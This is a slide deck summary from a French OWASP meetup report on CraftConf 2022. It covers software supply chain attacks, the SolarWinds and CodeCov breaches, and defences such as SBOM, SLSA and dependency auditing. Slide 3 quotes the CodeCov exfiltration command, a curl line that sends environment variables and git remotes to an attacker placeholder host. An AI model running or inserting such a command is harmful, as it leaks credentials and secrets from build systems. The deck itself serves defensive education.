REX CraftConf 2022 / Supply Chain Attack
0 likes35 views
The document discusses supply chain attacks and recommendations to improve software supply chain security. It notes that supply chain attacks increased over 650% from 2020 to 2021. Examples provided include the SolarWinds/Orion and CodeCov breaches. The document outlines recommendations from Google's Eric Brewer for building secure codebases, including having a single trusted build system, universal library versions, and private repositories. It recommends tools for security component analysis, reducing dependencies, and keeping track of runtime components. Open source responsibilities are compared to adopting a puppy.
REX CraftConf 2022 / Supply Chain Attack
- 1. REX CraftConf 2022 OWASP France Meetup juin 2022
- 2. Supply Chain Attacks +650% (Sonatype 2021 report - https://www.sonatype.com/resources/state-of-the-software-supply-chain-2021)
- 3. Exemples SolarWinds/Orion - Initial Access: ??? CodeCov - OpenSource App de scan de code - Initial Access: mot de passe dans une image docker - Exfiltration: curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://ATTACKERIP/upload/v2 || true https://blog.gitguardian.com/codecov-supply-chain-breach/
- 4. Google/Eric Brewer Google Nation-grade attackers - 1 giant codebase - Single trusted build system - Proof that code review happened - Knowledge of authors & reviewers - Universal libs (same version) - Private repos
- 5. Conseils/Outils/M辿thodes - SCA (npm audit/python safety/) - Choisissez / valuer vos d辿pendances - R辿duire le nombre de d辿pendances - Update or die - SBOM (Dependency Track!) / Savoir ce qui tourne sur votre cluster / en production - Educate! https://twitter.com/garrows/status/1 065217184643768320?lang=fr
- 6. (Google) Conseils/Outils/M辿thodes - SLSA: https://github.com/slsa-framework/s lsa - OpenSSF Security ScoreCards: https://github.com/ossf/scorecard - Open Source Insights : https://deps.dev - https://osv.dev/
- 7. OpenSource is like a puppy Come for free but with responsibility